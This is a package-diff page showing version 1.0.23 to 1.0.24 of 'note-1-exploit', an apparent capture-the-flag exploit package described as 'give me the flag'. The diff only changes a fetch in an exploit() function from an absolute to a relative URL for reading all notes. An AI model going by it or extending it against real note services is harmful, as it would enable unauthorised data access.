note-1-exploit 1.0.23 → 1.0.24

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,5 +1,5 @@
1
1
  async function exploit() {
2
- let all_results = await fetch("http://web/api/notes/all", {
2
+ let all_results = await fetch("/api/notes/all", {
3
3
  "headers": {
4
4
  "accept": "*/*",
5
5
  "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-1-exploit",
3
- "version": "1.0.23",
3
+ "version": "1.0.24",
4
4
  "description": "give me the flag",
5
5
  "main": "index.js",
6
6
  "scripts": {